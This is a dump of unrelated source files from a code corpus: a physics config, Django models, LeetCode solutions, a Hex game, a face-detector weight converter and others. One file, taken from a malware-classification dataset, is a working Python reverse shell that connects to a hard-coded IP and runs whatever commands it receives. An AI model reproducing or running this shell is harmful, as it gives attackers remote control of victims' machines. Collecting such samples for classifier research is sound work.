connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
globaltag = cms.string('74X_dataRun2_Prompt_v2'),
toGet = cms.VPSet(
cms.PSet(record = cms.string("EcalIntercalibConstantsRcd"),
tag = cms.string("EcalIntercalibConstants_2012ABCD_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_ECAL"),
),
cms.PSet(record = cms.string("EcalPulseShapesRcd"),
tag = cms.string("EcalPulseShapes_data"),
connect = cms.untracked.string("sqlite_file:/afs/cern.ch/cms/CAF/CMSALCA/ALCA_ECALCALIB/pulseShapes/ecaltemplates_popcon_timeShifted_-1p000000ns.db"),
),
cms.PSet(record = cms.string("EBAlignmentRcd"),
tag = cms.string("EBAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("EEAlignmentRcd"),
tag = cms.string("EEAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("ESAlignmentRcd"), # only Bon!
tag = cms.string("ESAlignment_measured_v08_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
)
)
|
[
"[email protected]"
] | |
b672d74dc3ade9ca857ed2b97d2a8bc96d25a527
|
d78989a8ce52a98f48d77228c4ea893f7aae31f7
|
/symbolic_expressions/sample15-virt-bogus-loop-iterations-2.py
|
80503fc33404de03c7ff542b5ba14a32feb2dee4
|
[] |
no_license
|
llyuer/Tigress_protection
|
78ead2cf9979a7b3287175cd812833167d520244
|
77c68c4c949340158b855561726071cfdd82545f
|
refs/heads/master
| 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null |
UTF-8
|
Python
| false | false | 1,086 |
py
|
#!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_342 = SymVar_0
ref_353 = ref_342 # MOV operation
ref_365 = ref_353 # MOV operation
ref_367 = ref_365 # MOV operation
ref_331345 = ref_367 # MOV operation
ref_331357 = ref_331345 # MOV operation
ref_331403 = ref_331345 # MOV operation
ref_331447 = ref_331345 # MOV operation
ref_331534 = (((rol(0xE, (rol(0xE, ((((((((((((0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) + ref_331357) & 0xFFFFFFFFFFFFFFFF) + 0x1F3D5B79) & 0xFFFFFFFFFFFFFFFF)) ^ ref_331403)) ^ 0x1F3D5B79) + ref_331447) & 0xFFFFFFFFFFFFFFFF) # MOV operation
ref_527456 = ref_331534 # MOV operation
ref_592749 = ref_527456 # MOV operation
ref_788657 = ref_592749 # MOV operation
ref_853947 = ref_788657 # MOV operation
ref_853985 = ref_853947 # MOV operation
ref_853997 = ref_853985 # MOV operation
ref_853999 = ref_853997 # MOV operation
print ref_853999 & 0xffffffffffffffff
|
[
"[email protected]"
] | |
a741f54aa2bfa5f22db1890af574ff5b01ac58b0
|
4b46bcb9e3883a57f46d490da424e8d9463ba8aa
|
/PyFolder/Python_Django/app_integration/apps/appintegrate/models.py
|
9f694e3217e40b8ecf4af783c0155140d3aaa317
|
[] |
no_license
|
LAdkins81/DojoAssignments
|
1752c131454dc6f259d4e84390af218e1a423b50
|
7bc7a92bed72ff37c5d8991e478ffae8fefd82db
|
refs/heads/master
| 2021-01-11T17:53:03.814123 | 2017-05-09T14:58:33 | 2017-05-09T14:58:33 | 79,859,799 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 905 |
py
|
from __future__ import unicode_literals
from django.db import models
from ..courses.models import Course
from ..loginandreg.models import User
from django.db.models import Count
# Create your models here.
class UserCourseManager(models.Manager):
    # Custom manager holding the enrollment logic for UserCourse.
    def addUserToCourse(self, object):
        """Enroll a user in a course.

        Expects *object* to be a mapping with 'users' (a User pk) and
        'courses' (a Course pk); creates the UserCourse row and returns a
        success message dict.
        """
        # NOTE(review): the parameter name `object` shadows the builtin —
        # renaming it would be cleaner, but could break keyword callers.
        # NOTE(review): User.objects.get / Course.objects.get raise
        # DoesNotExist for unknown ids — presumably callers validate first;
        # confirm.
        user_id = object['users']
        user = User.objects.get(id=user_id)
        course_id = object['courses']
        course = Course.objects.get(id=course_id)
        UserCourse.objects.create(user_id=user, course_id=course)
        return {'success' : 'User added to course'}
class UserCourse(models.Model):
    # Join table linking a User to a Course (one row per enrollment).
    # NOTE(review): these ForeignKey fields are named `*_id` but hold model
    # instances, so the underlying DB columns become `user_id_id` /
    # `course_id_id` — confirm before renaming, as migrations would change.
    user_id = models.ForeignKey(User, null=True, related_name="reg_users")
    course_id = models.ForeignKey(Course, related_name="reg_courses")
    created_at = models.DateTimeField(auto_now_add=True, null=True)
    updated_at = models.DateTimeField(auto_now=True)
    objects = UserCourseManager()
|
[
"[email protected]"
] | |
57968c4b0079829bed20ff53911d5d768715b9fd
|
7798c5171e4f63b40e9a2d9ae16f4e0f60855885
|
/manage.py
|
b3a505230aac16ae6ce9859ed552d3f4d09d2d80
|
[] |
no_license
|
mstepniowski/wffplanner
|
d2d5ddd2938bd2b7b294332dad0d24fa63c2700a
|
62d1d00ca9a546b759e5c394c7a9da06484a7aa3
|
refs/heads/master
| 2020-05-20T06:04:22.413395 | 2015-10-01T16:12:48 | 2015-10-01T16:12:48 | 6,033,243 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 256 |
py
|
#!/usr/bin/env python
# Django's command-line utility for administrative tasks.
import os
import sys
if __name__ == "__main__":
    # Point Django at the project settings unless the environment already
    # chose a settings module, then hand the CLI args to Django's dispatcher.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wffplanner.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
945d9d0dbf297f3e00334a032fd8cd7922a9654e
|
6cd87462fd9b5ee575aee281f6d2e4be5391ea92
|
/apps/twitter/admin.py
|
f4524da329c2671ab002a1df4a319053a229dfa3
|
[] |
no_license
|
mo-mughrabi/djsocial
|
912413574fd7ce943387dbd5744f05ec8ca57f48
|
060c0a8e0db848879dfaeb4c6f44f1dba7a39aea
|
refs/heads/master
| 2016-09-16T10:46:05.853935 | 2014-03-13T19:14:41 | 2014-03-13T19:14:41 | 16,213,862 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from models import Twitter, ScheduleOrder, Order
class TwitterAdmin(admin.ModelAdmin):
    # Columns shown on the Twitter changelist page.
    list_display = ('user', 'tid', 'screen_name','followers_sum', 'following_sum')
# Now register the new TwitterAdmin...
admin.site.register(Twitter, TwitterAdmin)
class ScheduleOrderAdmin(admin.ModelAdmin):
    # Columns shown on the ScheduleOrder changelist page.
    list_display = ('user', 'label', 'status','created_at', 'last_run')
admin.site.register(ScheduleOrder, ScheduleOrderAdmin)
class OrderAdmin(admin.ModelAdmin):
    # Columns shown on the Order changelist page.
    list_display = ('user', 'schedule_order', 'status','created_at', 'executed_at')
admin.site.register(Order, OrderAdmin)
|
[
"="
] |
=
|
4a2d4fecf255307e71b25519413f146f1bdacfd9
|
56b36ddf920b5f43e922cb84e8f420f1ad91a889
|
/Leetcode/Leetcode - Premium/Mock Interview/isSubsequence.py
|
053496e29b0e65f9a467defbd48dcafc83eb967e
|
[] |
no_license
|
chithien0909/Competitive-Programming
|
9ede2072e85d696ccf143118b17638bef9fdc07c
|
1262024a99b34547a3556c54427b86b243594e3c
|
refs/heads/master
| 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,279 |
py
|
"""
Given a string s and a string t, check if s is subsequence of t.
You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string, and s is a short string (<=100).
A subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, "ace" is a subsequence of "abcde" while "aec" is not).
Example 1:
s = "abc", t = "ahbgdc"
Return true.
Example 2:
s = "axc", t = "ahbgdc"
Return false.
Follow up:
If there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?
Credits:
Special thanks to @pbrother for adding this problem and creating all test cases.
"""
class Solution:
    def isSubsequence(self, s: str, t: str) -> bool:
        """Return True if *s* is a subsequence of *t*.

        Two-pointer scan: advance through t once, advancing the s-pointer
        on each match; O(len(t)) time, O(1) space.
        """
        if len(s) == 0:
            return True
        curS, curT = 0, 0
        while curT <= len(t) - 1:
            if s[curS] == t[curT]:
                curS += 1
                if curS == len(s):
                    return True
            curT += 1
        # Bug fix: the original ended with `return curS == l`, where `l` is
        # undefined (NameError on every not-found input). Reaching this
        # point means t was exhausted before all of s matched.
        return False
s = Solution()
print(s.isSubsequence("abc","ahbgdc"))
|
[
"[email protected]"
] | |
b28d0abd6a484e23c277ddb74ecf8140c4ca1fe5
|
1bdf38834c22b0100595cb22f2862fd1ba0bc1e7
|
/code308RangeSumQuery2DMutable.py
|
f914f056042314c3f89d84a5b8ddf3bfe388b092
|
[] |
no_license
|
cybelewang/leetcode-python
|
48d91c728856ff577f1ccba5a5340485414d6c6e
|
635af6e22aa8eef8e7920a585d43a45a891a8157
|
refs/heads/master
| 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,454 |
py
|
"""
308. Range Sum Query 2D - Mutable
Given a 2D matrix matrix, find the sum of the elements inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).
The above rectangle (with the red border) is defined by (row1, col1) = (2, 1) and (row2, col2) = (4, 3), which contains sum = 8.
Example:
Given matrix = [
[3, 0, 1, 4, 2],
[5, 6, 3, 2, 1],
[1, 2, 0, 1, 5],
[4, 1, 0, 1, 7],
[1, 0, 3, 0, 5]
]
sumRegion(2, 1, 4, 3) -> 8
update(3, 2, 2)
sumRegion(2, 1, 4, 3) -> 10
Note:
The matrix is only modifiable by the update function.
You may assume the number of calls to update and sumRegion function is distributed evenly.
You may assume that row1 ≤ row2 and col1 ≤ col2.
"""
"""
Similar problem: 304 Range Sum Query 2D - Immutable
Use Binary Index Tree (BIT) to quickly get the sum of the rectangle area from (0, 0) to (row, col), inclusive
"""
import unittest
class NumMatrix:
    """Mutable 2-D range-sum structure backed by a 2-D binary indexed tree.

    Supports point updates and rectangle-sum queries, both in
    O(log M * log N) time.
    """

    def __init__(self, matrix):
        self.M = len(matrix)
        self.N = len(matrix[0]) if self.M > 0 else 0
        # Current cell values, 0-based; kept so absolute `update` calls can
        # be converted into deltas for the tree.
        self.mat = [[0] * self.N for _ in range(self.M)]
        # Fenwick tree over both dimensions, 1-based: (M+1) x (N+1).
        self.bit = [[0] * (self.N + 1) for _ in range(self.M + 1)]
        for r in range(self.M):
            for c in range(self.N):
                self.update(r, c, matrix[r][c])

    def update(self, row: int, col: int, val: int) -> None:
        """Set cell (row, col) to *val*; out-of-range coordinates are a no-op."""
        if not (-1 < row < self.M and -1 < col < self.N):
            return
        delta = val - self.mat[row][col]
        self.mat[row][col] = val
        r = row + 1  # shift to the tree's 1-based index
        while r <= self.M:
            c = col + 1
            while c <= self.N:
                self.bit[r][c] += delta
                c += c & (-c)
            r += r & (-r)

    def getSum(self, row: int, col: int) -> int:
        """Sum of the rectangle from (0, 0) up to — but excluding — (row, col)."""
        if not (-1 < row - 1 < self.M and -1 < col - 1 < self.N):
            return 0
        total = 0
        r = row
        while r > 0:
            c = col
            while c > 0:
                total += self.bit[r][c]
                c -= c & (-c)
            r -= r & (-r)
        return total

    def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
        """Inclusive rectangle sum via four prefix-sum queries."""
        return (self.getSum(row2 + 1, col2 + 1)
                - self.getSum(row2 + 1, col1)
                - self.getSum(row1, col2 + 1)
                + self.getSum(row1, col1))
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# obj.update(row,col,val)
# param_2 = obj.sumRegion(row1,col1,row2,col2)
class Test(unittest.TestCase):
    # Sanity checks for NumMatrix using the example from the problem statement.
    def test_1(self):
        matrix = [[3, 0, 1, 4, 2],\
                  [5, 6, 3, 2, 1],\
                  [1, 2, 0, 1, 5],\
                  [4, 1, 0, 1, 7],\
                  [1, 0, 3, 0, 5]]
        #matrix = [[3, 0], [5, 6]]
        m = NumMatrix(matrix)
        # Prefix sum of the exclusive rectangle (0,0)..(2,2).
        self.assertEqual(14, m.getSum(2, 2))
        self.assertEqual(8, m.sumRegion(2, 1, 4, 3))
        # A point update must be reflected in subsequent queries.
        m.update(3, 2, 2)
        self.assertEqual(10, m.sumRegion(2, 1, 4, 3))
if __name__ == "__main__":
unittest.main(exit = False)
|
[
"[email protected]"
] | |
4125a3a6906417841daee6699df1daa262068870
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03069/s036551857.py
|
273e2d32d2871800eb6b588af947e2fe9c71f0b3
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 269 |
py
|
import sys,math,collections,itertools  # NOTE(review): math/collections/itertools unused here
input = sys.stdin.readline
N = int(input())  # length of s (read but not used; len(s) is used instead)
s = input().rstrip()
# Appears to be the "no '.' to the right of a '#'" repaint problem: the final
# string must look like '.'*k + '#'*(n-k); find the cheapest split point.
cntb =0               # count of '#' in the prefix s[:i+1] (repaint to '.')
cntw = s.count('.')   # count of '.' in the remaining suffix (repaint to '#')
ans =cntw             # split before index 0: repaint every '.'
for i in range(len(s)):
    if s[i] == '#':
        cntb +=1
    else:
        cntw -=1
    # Cost of splitting right after position i.
    ans = min(ans,cntb+cntw)
print(ans)
|
[
"[email protected]"
] | |
f6bdf4d9d98945b174ea3626cac9c7f21706ba7e
|
73e939e797cc28aa33a4f55c234237c47167033e
|
/test/test_transaction_summary.py
|
b5bc1ae60e987c82adcad1bf24cbb8c6ef351245
|
[] |
no_license
|
dmlerner/ynab-api
|
b883a086e6ce7c5d2bdb5b17f3f0a40dbb380046
|
df94b620d9ec626eacb9ce23bfd313f1c589b03a
|
refs/heads/master
| 2023-08-17T14:22:17.606633 | 2023-07-03T17:05:16 | 2023-07-03T17:05:16 | 223,287,209 | 27 | 13 | null | 2023-08-05T18:58:58 | 2019-11-21T23:58:22 |
Python
|
UTF-8
|
Python
| false | false | 975 |
py
|
"""
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ynab_api
from ynab_api.model.transaction_summary import TransactionSummary
class TestTransactionSummary(unittest.TestCase):
    """TransactionSummary unit test stubs (scaffolding from openapi-generator)."""
    def setUp(self):
        # No fixtures yet — stub kept for symmetry with generated tests.
        pass
    def tearDown(self):
        pass
    def testTransactionSummary(self):
        """Test TransactionSummary"""
        # FIXME: construct object with mandatory attributes with example values
        # model = TransactionSummary()  # noqa: E501
        pass
if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
0fb0c324b7732ab490a71f2d069eca7673a43eb2
|
7a87119ef5d77a1b225aab45083a45dcd376684c
|
/6_palindroom.py
|
b71f3511d35f1b2ab48041d139ac45ce6325a707
|
[] |
no_license
|
astilleman/MI
|
0e31e0f4098502e83a13805feae82e038c169bb7
|
1564fd28f759761c3e186d41107c9abff3b69070
|
refs/heads/master
| 2023-03-29T19:14:46.817308 | 2021-04-06T15:43:17 | 2021-04-06T15:43:17 | 337,495,283 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,100 |
py
|
"""
Een palindroom is een string die hetzelfde leest van links naar
rechts, als omgekeerd. Enkele voorbeelden van palindromen zijn:
- kayak
- racecar
- was it a cat I saw
Schrijf een recursieve functie die een string vraagt aan de gebruiker en
nakijkt of deze string al dan niet een palindroom is. Indien de
ingevoerde string een palindroom is, moet de functie True teruggeven,
anders geeft de functie False terug.
Je mag ervan uitgaan dat de gegeven string geen spaties bevat.
Let op: Zorg ervoor dat je functie niet hoofdlettergevoelig is.
"""
def is_palindroom(string):
result = True
if string == "":
exit()
if string[0] != string[-1]:
result = False
else:
result = is_palindroom(string[1:len(string)])
return result
# TESTS
assert is_palindroom("")
assert is_palindroom("a")
assert is_palindroom("aa")
assert not is_palindroom("ab")
assert is_palindroom("aba")
assert not is_palindroom("aab")
assert is_palindroom("kayak")
assert not is_palindroom("racehorse")
assert is_palindroom("racecar")
assert is_palindroom("wasitacatIsaw")
|
[
"[email protected]"
] | |
174e5543c3d14be2f7973435e139bd2bb9bc19b5
|
ef2f932655e4591c4f654431cd96eedd0af2b5ba
|
/tests/example.py
|
b717490fbd69d71977bed6f795fb9a7c57e8a744
|
[
"MIT"
] |
permissive
|
cair/hex-ai
|
b380447c6dd445452c161babefdfadf329e899fa
|
70c134a1479b58634e62c845314c7536ad64e4be
|
refs/heads/master
| 2021-08-03T02:37:13.928443 | 2021-07-26T19:58:51 | 2021-07-26T20:02:29 | 209,273,454 | 0 | 0 |
MIT
| 2021-04-19T17:44:02 | 2019-09-18T09:46:06 |
C
|
UTF-8
|
Python
| false | false | 540 |
py
|
from PyHex import Hex11 as Hex

if __name__ == "__main__":
	# Random self-play on an 11x11 Hex board, repeated many times.
	hg = Hex.HexGame()
	winner = -1
	for game in range(10000000):
		Hex.init(hg)
		player = 0
		# Alternate random placements until the board fills or someone wins.
		while Hex.full_board(hg) == 0:
			position = Hex.place_piece_randomly(hg, player)
			if Hex.winner(hg, player, position):
				winner = player
				break
			player = 1 - player
		# Only report games that ended with many cells still open, i.e.
		# quick wins. NOTE(review): threshold semantics assumed — confirm
		# against PyHex's number_of_open_positions.
		if hg.number_of_open_positions >= 75:
			print("\nPlayer %s wins!\n\n" % (winner, ))
			Hex.print(hg)
|
[
"[email protected]"
] | |
66eef6585fd94f0ceff511a5bcdfafdbbc1d0330
|
b580fd482147e54b1ca4f58b647fab016efa3855
|
/host_im/mount/malware-classification-master/samples/virus/sample_bad382.py
|
9b733b70a15ec41b80a16eccdf59369f39e4f4a9
|
[] |
no_license
|
Barnsa/Dissertation
|
1079c8d8d2c660253543452d4c32799b6081cfc5
|
b7df70abb3f38dfd446795a0a40cf5426e27130e
|
refs/heads/master
| 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 318 |
py
|
# SECURITY NOTE(review): this file is a malware *sample* from a
# malware-classification dataset. It is a reverse shell: it connects out to
# a hard-coded address and executes any command the remote peer sends,
# returning the output. Documented verbatim for analysis — NEVER execute.
import bz2          # unused in this sample
import threading    # unused
import socket
import subprocess
import lzma         # unused
import hashlib      # unused
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))  # hard-coded C2 endpoint
while not False:  # loop until the peer closes the connection
	command = s.recv(1024).decode("utf-8")
	if not command: break
	data = subprocess.check_output(command, shell=True)  # arbitrary remote command execution
	s.send(data)
|
[
"[email protected]"
] | |
b10302ab2daca47e9bd8afe17228e2f901d2976a
|
d00b1e01f82076248eb07d6391fafabfbac74898
|
/metadata/FrostNumber/hooks/pre-stage.py
|
7f090d9c2b69e9473bb79627b7d4db1dbab856b5
|
[
"MIT"
] |
permissive
|
csdms/wmt-metadata
|
9b922415faa397e3d5511f258e1a4fda846b78b7
|
39207acc376f1cd21b2ae1d5581a1e2c317a6441
|
refs/heads/master
| 2020-04-07T00:39:56.268862 | 2019-02-26T21:24:20 | 2019-02-26T21:24:20 | 51,040,972 | 0 | 0 |
MIT
| 2018-10-31T19:36:54 | 2016-02-04T00:23:47 |
Python
|
UTF-8
|
Python
| false | false | 769 |
py
|
"""A hook for modifying parameter values read from the WMT client."""
import os
import shutil
from wmt.utils.hook import find_simulation_input_file, yaml_dump
from topoflow_utils.hook import assign_parameters
file_list = []  # names of file-type parameters; filled in by assign_parameters
def execute(env):
    """Perform pre-stage tasks for running a component.

    Computes the run's end year, fixes the output file name, resolves the
    component's file parameters, copies each referenced input file into the
    working directory, and dumps the final environment to ``_env.yaml``.

    Parameters
    ----------
    env : dict
        A dict of component parameter values from WMT.
    """
    # NOTE(review): long() is Python 2 only — this hook predates Python 3.
    env['end_year'] = long(env['start_year']) + long(env['_run_duration']) - 1
    env['fn_out_filename'] = 'frostnumber_output.dat'
    assign_parameters(env, file_list)
    # Stage every referenced simulation input file next to the run.
    for fname in file_list:
        src = find_simulation_input_file(env[fname])
        shutil.copy(src, os.curdir)
    env['_file_list'] = file_list
    yaml_dump('_env.yaml', env)
|
[
"[email protected]"
] | |
a296c689355de9ff44465c89010087d206693bda
|
e15d63ccde04e7458bff5af1bdad63a5c699b489
|
/example/Model_Conversion/mx2torch/retinaface_r50/res50_transfer_weight.py
|
17e4e530621f5d1100de117f9e520503564c3aba
|
[
"WTFPL"
] |
permissive
|
ddddwee1/TorchSUL
|
775b6a2b1e4ab7aac25a3f0411de83affc257af5
|
6c7cd41b14fc8b746983e8b981d1ba4d08370ca2
|
refs/heads/master
| 2023-08-21T15:21:24.131718 | 2023-08-18T09:37:56 | 2023-08-18T09:37:56 | 227,628,298 | 13 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,870 |
py
|
import numpy as np
from TorchSUL import Model as M
import torch
import torch.nn as nn
import torch.nn.functional as F
class Unit(M.Model):
    """Pre-activation ResNet bottleneck (BN -> ReLU -> 1x1 -> 3x3 -> 1x1).

    forward returns the block output together with the activation after the
    first 1x1 conv, which Stage exposes as a lateral feature.
    """
    def initialize(self, chn, stride=1, shortcut=False):
        self.bn0 = M.BatchNorm()
        self.act = M.Activation(M.PARAM_RELU)
        self.c1 = M.ConvLayer(1, chn, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.c2 = M.ConvLayer(3, chn, stride=stride, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.c3 = M.ConvLayer(1, chn * 4, usebias=False)
        self.shortcut = shortcut
        if shortcut:
            # Projection shortcut, used on the first unit of each stage.
            self.sc = M.ConvLayer(1, chn * 4, stride=stride, usebias=False)
    def forward(self, inp):
        # Pre-activation is shared by the residual branch (and, when present,
        # by the projection shortcut as well).
        pre = self.act(self.bn0(inp))
        branch = lateral = self.c1(pre)
        branch = self.c3(self.c2(branch))
        if self.shortcut:
            out = self.sc(pre) + branch
        else:
            # Identity shortcut adds the ORIGINAL (un-normalised) input.
            out = inp + branch
        return out, lateral
class Stage(M.Model):
    """A stack of bottleneck Units; only the first unit strides and projects.

    forward returns the stage output plus the FIRST unit's post-1x1
    activation, used by Detector as a lateral (FPN) feature.
    """
    def initialize(self, outchn, num_units, stride):
        self.units = nn.ModuleList()
        for k in range(num_units):
            is_first = (k == 0)
            self.units.append(
                Unit(outchn, stride=stride if is_first else 1, shortcut=is_first))
    def forward(self, x):
        for k, unit in enumerate(self.units):
            if k == 0:
                x, lateral = unit(x)
            else:
                x, _ = unit(x)
        return x, lateral
class DETHead(M.Model):
    """SSH-style detection head: one direct 3x3 branch plus a two-level
    context module; the three branch outputs are concatenated on the channel
    axis and passed through a final ReLU.
    """
    def initialize(self):
        self.c11 = M.ConvLayer(3, 256, batch_norm=True)
        self.c21 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
        self.c22 = M.ConvLayer(3, 128, batch_norm=True)
        self.c31 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
        self.c32 = M.ConvLayer(3, 128, batch_norm=True)
        self.act = M.Activation(M.PARAM_RELU)
    def forward(self, x):
        direct = self.c11(x)
        context = self.c21(x)
        shallow = self.c22(context)
        deep = self.c32(self.c31(context))
        merged = torch.cat([direct, shallow, deep], dim=1)
        return self.act(merged)
class RegressHead(M.Model):
    """Per-level prediction head producing class probabilities, bbox deltas
    and landmark offsets (channel counts suggest 2 anchors per location —
    RetinaFace convention, confirm against the deployed config).
    """
    def initialize(self):
        self.c1 = M.ConvLayer(1, 4)    # class scores
        self.c2 = M.ConvLayer(1, 8)    # bbox regression
        self.c3 = M.ConvLayer(1, 20)   # landmark regression
    def forward(self, x):
        logits = self.c1(x)
        bbox = self.c2(x)
        kpts = self.c3(x)
        b, _, h, w = logits.shape
        # Fold the anchor pairs into the height axis so dim=1 holds exactly
        # the two class scores, softmax there, then restore (B, 4, H, W).
        prob = F.softmax(logits.view(b, 2, h * 2, w), dim=1).view(b, 4, -1, w)
        return prob, bbox, kpts
class Detector(M.Model):
    """RetinaFace-style detector: a ResNet-50-shaped trunk feeding a 3-level
    top-down feature pyramid, with an SSH DETHead and a RegressHead at each
    of the three output strides (32, 16, 8).
    """
    def initialize(self):
        # Backbone stem + four residual stages.
        self.bn0 = M.BatchNorm()
        self.c1 = M.ConvLayer(7, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.pool = M.MaxPool2D(3, 2)
        self.stage1 = Stage(64, num_units=3, stride=1)
        self.stage2 = Stage(128, num_units=4, stride=2)
        self.stage3 = Stage(256, num_units=6, stride=2)
        self.stage4 = Stage(512, num_units=3, stride=2)
        self.bn1 = M.BatchNorm()
        self.act = M.Activation(M.PARAM_RELU)
        # Stride-32 branch.
        self.ssh_c3_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.det3 = DETHead()
        self.head32 = RegressHead()
        # Stride-16 branch (lateral + upsampled stride-32 features).
        self.ssh_c2_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.ssh_c3_upsampling = M.NNUpSample(2)
        self.ssh_c2_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.det2 = DETHead()
        self.head16 = RegressHead()
        # Stride-8 branch (lateral + upsampled stride-16 features).
        self.ssh_m1_red_conv = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.ssh_c2_upsampling = M.NNUpSample(2)
        self.ssh_c1_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.det1 = DETHead()
        self.head8 = RegressHead()
    def forward(self, x):
        # Trunk; stage3/stage4 also expose lateral features for the pyramid.
        x = self.pool(self.c1(self.bn0(x)))
        x, _ = self.stage1(x)
        x, _ = self.stage2(x)
        x, f1 = self.stage3(x)
        x, f2 = self.stage4(x)
        x = self.act(self.bn1(x))
        # Stride-32 predictions.
        fc3 = self.ssh_c3_lateral(x)
        d3 = self.det3(fc3)
        scr32, box32, lmk32 = self.head32(d3)
        # Stride-16: fuse the stage-4 lateral with the upsampled stride-32 map.
        fc2 = self.ssh_c2_lateral(f2)
        up3 = self.ssh_c3_upsampling(fc3)
        up3 = up3[:, :, :fc2.shape[2], :fc2.shape[3]]  # crop overshoot after 2x upsample
        fc2_aggr = self.ssh_c2_aggr(fc2 + up3)
        d2 = self.det2(fc2_aggr)
        scr16, box16, lmk16 = self.head16(d2)
        # Stride-8: fuse the stage-3 lateral with the upsampled stride-16 map.
        fc1 = self.ssh_m1_red_conv(f1)
        up2 = self.ssh_c2_upsampling(fc2_aggr)
        up2 = up2[:, :, :fc1.shape[2], :fc1.shape[3]]
        fc1_aggr = self.ssh_c1_aggr(fc1 + up2)
        d1 = self.det1(fc1_aggr)
        scr8, box8, lmk8 = self.head8(d1)
        return [scr32, box32, lmk32, scr16, box16, lmk16, scr8, box8, lmk8]
# Weight transfer: trace the torch model once, then copy every parameter and
# buffer from an MXNet-style name space (module `source`) into it by building
# parallel lists of (torch name, mxnet name) pairs, and finally save the
# converted checkpoint.
if __name__=='__main__':
	net = Detector()
	net.eval()
	# One dummy forward pass so all lazily-built layers materialise.
	x = torch.from_numpy(np.ones([1,3,640,640]).astype(np.float32))
	_ = net(x)
	# net.bn_eps(1e-5)
	# net.backbone.det1.bn_eps(2e-5)
	# Index every torch parameter AND buffer by its dotted name.
	res = {}
	ps = net.named_parameters()
	for p in ps:
		name, p = p
		res[name] = p
	ps = net.named_buffers()
	for p in ps:
		name, p = p
		res[name] = p
	# Each helper returns ([torch names], [mxnet names]) for one layer kind.
	def get_bn(l1, l2):
		a = []
		b = []
		a.append(l1+'.weight')
		a.append(l1+'.bias')
		a.append(l1+'.running_mean')
		a.append(l1+'.running_var')
		b.append(l2+'_gamma')
		b.append(l2+'_beta')
		b.append(l2+'_moving_mean')
		b.append(l2+'_moving_var')
		return a, b
	def get_conv(l1, l2, bias=False):
		a = [l1 + '.weight']
		b = [l2 + '_weight']
		if bias:
			a.append(l1+'.bias')
			b.append(l2+'_bias')
		return a,b
	def get_layer(l1, l2, bias=False):
		# NOTE(review): unused below; kept from an earlier mapping scheme.
		res = []
		res.append(get_conv(l1 + '.conv', l2%('conv')))
		res.append(get_bn(l1 + '.bn', l2%('batchnorm')))
		return res
	def get_convbn(l1, l2, bias=False):
